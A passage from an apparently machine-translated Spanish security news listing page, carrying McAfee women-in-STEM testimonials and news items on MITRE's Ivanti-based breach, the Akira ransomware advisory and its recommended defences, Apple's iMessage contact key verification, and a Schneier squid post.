habilidades para resolver problemas. Lo más importante es que no dudes en hablar, mantener la curiosidad y nunca dejar de aprender: ¡las posibilidades en STEM son infinitas! Richa: Gerente de Programa Técnico “Impulsado por una sed de conocimiento y un profundo deseo de contribuir al mundo, me embarqué en mi viaje STEM impulsado por mi pasión por la ciencia. Hoy, como gerente de programas técnicos con más de 10 años en McAfee, estoy orgulloso de ser parte de una empresa que fomenta la innovación y capacita a las personas para marcar la diferencia. McAfee ha sido más que un simple lugar de trabajo; es una comunidad vibrante donde he prosperado. Pero el impacto de la comunidad WISE ha sido verdaderamente transformador. Brindó un apoyo invaluable, fomentó la colaboración y ofreció oportunidades de desarrollo de liderazgo específicamente para mujeres en McAfee. A través de WISE, me he conectado con personas increíbles, celebré nuestros logros y encontré un sentido de pertenencia e inclusión. A las mujeres jóvenes que están considerando una carrera en STEM: ¡No lo duden! Este campo le permite encontrar su voz y adquirir una experiencia invaluable. Adopte proyectos del mundo real; Agudizarán su pensamiento, desbloquearán el potencial de liderazgo y abrirán puertas a infinitas oportunidades de aprendizaje. Recuerde, su perspectiva y contribuciones únicas son esenciales para dar forma al futuro de STEM”. Sowmya: Gerente de Gobernanza de Datos “Crecer rodeada de la academia, con una madre que llegó a dirigir una universidad para mujeres, me inculcó un profundo anhelo de avance profesional y liderazgo. Pero fue el atractivo de la resolución lógica de problemas y la emoción de la evolución de la tecnología, como presenciar el primer teléfono celular indio, lo que realmente me atrajo a STEM. Me embarqué en un viaje para desentrañar las complejidades de los sistemas de comunicación celular y satelital con una licenciatura en ingeniería electrónica y de comunicaciones, ansioso por desempeñar mi papel en la configuración del futuro y estar a la vanguardia de la innovación y las tecnologías emergentes. McAfee y la comunidad WISE Jugó un papel fundamental en mi carrera STEM. Como líder del grupo WISE de India, he tenido oportunidades invaluables para relacionarme con líderes globales, fomentar conexiones más sólidas dentro de la comunidad WISE de India, recibir reconocimiento, contribuir a las publicaciones de WISE y establecer relaciones de tutoría confiables. Estas experiencias no solo han empoderado a otros, sino que también me han brindado a mí una salida satisfactoria más allá de mi función de gestión de datos. Liderar WISE ha perfeccionado mis habilidades interpersonales, lo que me permite influir, conectar y generar confianza. Para las mujeres jóvenes que estén considerando una carrera en STEM, recuerden: el fracaso persiste solo mientras el miedo lo dicta. Adopte el aprendizaje permanente y no evite cambiar de dominio o mejorar sus habilidades. Mi carrera, que abarca más de 19 años, me ha llevado de ingeniero electrónico a gerente de gobierno de datos, lo que me ha obligado a adaptarme y aprender a lo largo del camino. Asuma riesgos calculados, acepte el cambio y siga sus instintos. Los viajes más transformadores suelen comenzar con un acto de fe. Recuerde, la inversión en crecimiento y cambio siempre vale la pena”. Si está interesado en el trabajo que hacemos o desea obtener más información sobre nuestras oportunidades profesionales en McAfee, visite nuestra página de empleos o únase a nuestra red de talentos para recibir actualizaciones sobre las oportunidades profesionales de McAfee. Presentamos McAfee+ Protección contra robo de identidad y privacidad para su vida digital Descargue McAfee+ ahora \x3Cimg height=»1″ width=»1″ style=»display:none» src=»https://www.facebook.com/tr?id= 766537420057144&ev=PageView&noscript=1″ />\x3C/noscript>’);

MITRE reveló que actores de estados-nación violaron sus sistemas a través de los días cero de Ivanti – Fuente: securityaffairs.com

MITRE reveló que actores de un estado-nación violaron sus sistemas a través de los días cero de Ivanti La Corporación MITRE reveló que un actor de un estado-nación comprometió sus sistemas en enero de 2024 al explotar los días cero de Ivanti VPN. En abril de 2024, MITRE reveló una brecha de seguridad en una de sus redes de investigación y creación de prototipos. El equipo de seguridad de la organización inició rápidamente una investigación, desconectó al actor de la amenaza y contrató equipos forenses de respuesta a incidentes de terceros para realizar análisis independientes en colaboración con expertos internos. Según MITRE Corporation, un actor estatal violó sus sistemas en enero de 2024 al encadenar dos vulnerabilidades de día cero de Ivanti Connect Secure. “A partir de enero de 2024, un actor de amenazas realizó un reconocimiento de nuestras redes, explotó una de nuestras redes privadas virtuales (VPN) a través de dos vulnerabilidades de día cero de Ivanti Connect Secure y eludió nuestra autenticación multifactor mediante el secuestro de sesión. A partir de ahí, se movieron lateralmente y profundizaron en la infraestructura VMware de nuestra red utilizando una cuenta de administrador comprometida”. lee una publicación publicada por la organización en Medium. «Emplearon una combinación de puertas traseras sofisticadas y webshells para mantener la persistencia y recopilar credenciales». MITRE detectó un actor de amenazas de estado-nación extranjero investigando su entorno de virtualización, investigación y experimentación en red (NERVE), utilizado para investigación y creación de prototipos. La organización inició inmediatamente acciones de mitigación que incluían desconectar NERVE. La investigación aún está en curso para determinar el alcance de la información involucrada. La organización notificó a las autoridades y afectados y está trabajando para restablecer alternativas operativas de colaboración. A pesar de que MITRE siguió diligentemente las mejores prácticas de la industria, implementó las recomendaciones de los proveedores y cumplió con las pautas gubernamentales para fortalecer, actualizar y fortalecer su sistema Ivanti, pasaron por alto el movimiento lateral hacia su infraestructura VMware. La organización dijo que la red empresarial central o los sistemas de los socios no se vieron afectados por este incidente. «Ninguna organización es inmune a este tipo de ciberataque, ni siquiera aquella que se esfuerza por mantener la mayor ciberseguridad posible», afirmó Jason Providakes, presidente y director ejecutivo de MITRE. “Estamos divulgando este incidente de manera oportuna debido a nuestro compromiso de operar en el interés público y defender las mejores prácticas que mejoren la seguridad empresarial, así como las medidas necesarias para mejorar la postura actual de ciberdefensa de la industria. Las amenazas y los ciberataques son cada vez más sofisticados y requieren mayores enfoques de vigilancia y defensa. Como lo hemos hecho anteriormente, compartiremos lo aprendido de esta experiencia para ayudar a otros y desarrollar nuestras propias prácticas”. Pierluigi Paganini Sígueme en Twitter: @securityaffairs y Facebook y Mastodon (SecurityAffairs – hacking, Ivanti) URL de la publicación original: https://securityaffairs.com/162045/security/mitre-security-breach-ivanti-zero-days.htmlCategoría y Etiquetas: Noticias de última hora,Hacking,Seguridad,noticias de hacking,noticias de seguridad de la información,Seguridad de la información de TI,Ivanti,MITRE,Pierluigi Paganini,Asuntos de seguridad,Noticias de seguridad,Zero-Days – Noticias de última hora,Hacking,Seguridad,noticias de hacking,noticias de seguridad de la información ,Seguridad de la información de TI,Ivanti,MITRE,Pierluigi Paganini,Asuntos de seguridad,Noticias de seguridad,Zero-Days

Akira Ransomware Group recauda 42 millones de dólares y 250 organizaciones se ven afectadas

El grupo de ransomware Akira ha generado alrededor de 42 millones de dólares en ingresos en el período comprendido entre marzo de 2023 y enero de 2024, según un aviso conjunto de Europol y agencias gubernamentales de EE. UU. y Holanda. Se cree que el actor de ransomware como servicio (RaaS) ha impactado a más de 250 organizaciones en América del Norte, Europa y Australia durante este período, siendo víctimas una amplia gama de empresas y organizaciones de infraestructura crítica. El aviso, publicado por la Oficina Federal de Investigaciones (FBI) de EE. UU., la Agencia de Seguridad Cibernética y de Infraestructura (CISA), el Centro Europeo de Ciberdelincuencia (EC3) de Europol y el Centro Nacional de Seguridad Cibernética de los Países Bajos (NCSC-NL), advirtió a las organizaciones sobre Las tácticas, técnicas y procedimientos (TTP) en evolución de Akira y le aconsejaron cómo defenderse de ellos. Cómo Akira infecta organizaciones con ransomware Akira es un grupo cibercriminal relativamente nuevo, que parece lanzarse en el primer trimestre de 2023. Desde entonces, el Informe sobre delitos en Internet 2023 del FBI encontró que Akira fue la tercera variante de ransomware más común que afectó la infraestructura crítica en 2023, detrás de LockBit y ALPHV/Gato Negro. El nuevo aviso señaló que los actores de amenazas de Akira se centraron inicialmente en los sistemas Windows, pero en abril de 2023 desarrollaron una variante de Linux dirigida a las máquinas virtuales VMware ESXi. Los afiliados de Akira usan cepas escritas en C++ y Rust, y usan extensiones .akira y .powerranges. Las técnicas de acceso inicial utilizadas por los actores de amenazas de Akira incluyen: Uso de vulnerabilidades conocidas de Cisco para acceder a organizaciones a través de un servicio de red privada virtual (VPN) sin autenticación multifactor (MFA) configurada Uso de servicios externos como el Protocolo de escritorio remoto (RDP) Spear ataques de phishing Abuso de credenciales Después del acceso inicial, los afiliados crean nuevas cuentas de dominio para establecer la persistencia. También se les ha observado aprovechando técnicas de ataque posteriores a la explotación, como Kerberoasting, para extraer credenciales almacenadas en la memoria de proceso del Servicio del Subsistema de Autoridad de Seguridad Local (LSASS). Las herramientas de extracción de credenciales como Mimikatz y LaZagne se utilizan para ayudar en la escalada de privilegios, mientras que otras herramientas como SoftPerfect y Advanced IP Scanner se utilizan a menudo con fines de reconocimiento. Para aumentar las posibilidades de éxito, se ha observado que algunos actores de amenazas de Akira implementan dos variantes distintas de ransomware contra diferentes arquitecturas de sistemas dentro del mismo evento de compromiso. También suelen desactivar el software de seguridad de las víctimas para evitar la detección, como el uso de PowerTool para explotar el controlador Zemana AntiMalware y finalizar los procesos relacionados con el antivirus. Las filiales de Akira aprovechan las herramientas de técnicas de exfiltración y cifrado como FileZilla, WinRAR, WinSCP y RClone para exfiltrar datos de las víctimas. La exfiltración se permite a través de varios protocolos, como el Protocolo de transferencia de archivos (FTP), el Protocolo seguro de transferencia de archivos (SFTP) y servicios de almacenamiento en la nube como Mega, con herramientas fácilmente disponibles como AnyDesk y el túnel Cloudflare que se utilizan para establecer canales de comando y control. El aviso observó que los actores de Akira suelen emplear un modelo de doble extorsión, mediante el cual los sistemas se cifran después de extraer datos. Esto les permite ejercer más presión sobre las víctimas amenazando con publicar datos exfiltrados en la red Tor. La nota de rescate de Akira proporciona a cada empresa un código único e instrucciones para contactar a los actores de la amenaza a través de una URL .onion. Los pagos de rescate se solicitan en Bitcoin a direcciones de billeteras de criptomonedas proporcionadas por los actores de la amenaza. Se emplea un sofisticado esquema de cifrado híbrido para bloquear los datos, capaz de cifrarse total o parcialmente. La recuperación del sistema se ve inhibida aún más por el cifrador de Akira que utiliza comandos de PowerShell para eliminar instantáneas de volumen (VSS) en sistemas Windows. Cómo defenderse contra los ataques de Akira El FBI, CISA, EC3 y NCSC-NL brindaron una variedad de recomendaciones para que los defensores se protejan contra las tácticas empleadas por Akira, que incluyen: Implementar un plan de recuperación para mantener y retener múltiples copias de datos confidenciales o de propiedad exclusiva. y servidores en una ubicación físicamente separada, segmentada y segura Exigir que todas las cuentas con inicios de sesión con contraseña cumplan con la guía del Instituto Nacional de Estándares y Tecnología (NIST) Aplicar MFA para todos los servicios, particularmente correo web, VPN y cuentas que acceden a sistemas críticos Mantener todos en funcionamiento sistemas, software y firmware actualizados, con parches oportunos Emplear segmentación de red para evitar la propagación de ransomware en el sistema Filtrar el tráfico de red evitando que orígenes desconocidos o no confiables accedan a servicios remotos en sistemas internos Implementar acceso basado en tiempo para cuentas configuradas en el nivel de administrador y superior Deshabilite las actividades y permisos de línea de comandos y secuencias de comandos Asegúrese de que todos los datos de respaldo estén cifrados y sean inmutables

Nueva función de iOS para frustrar ataques de suplantación de identidad: Semana de seguridad con Tony Anscombe

Vídeo Su iPhone acaba de recibir una nueva función llamada Verificación de clave de contacto de iMessage que está diseñada para ayudar a proteger sus mensajes de miradas indiscretas 15 de diciembre de 2023 Apple ha enviado iOS 17.2 a todos los usuarios e incluye una nueva función destinada a proteger a los usuarios de los atacantes quién podría estar haciendo un mal uso de la infraestructura del servidor iMessage de la empresa. Llamada Verificación de clave de contacto de iMessage, la función «verifica automáticamente que estás enviando mensajes a la persona que deseas», protegiendo así a las personas de los atacantes que intentan leer o escuchar las conversaciones de otras personas. ¿Qué impulsó a Apple a lanzar la función y cómo funciona exactamente? Descúbrelo en el vídeo. Conéctese con nosotros en Facebook, Twitter, LinkedIn e Instagram.

Blogs de Friday Squid: Squid Trackers

Friday Squid Blogging: Squid Trackers Un nuevo bioadhesivo facilita la fijación de rastreadores a los calamares. Nota: el artículo no analiza los derechos de privacidad de Squid. Como de costumbre, también puedes usar esta publicación de Squid para hablar sobre las historias de seguridad en las noticias que no he cubierto. Lea las pautas de publicación de mi blog aquí. Etiquetas: privacidad, calamar, seguimiento Publicado el 19 de abril de 2024 a las 17:05 • 5 comentarios Foto de la barra lateral de Bruce Schneier por Joe MacInnis.

Página 1 de 60

Funciona con WordPress & Tema de Anders Norén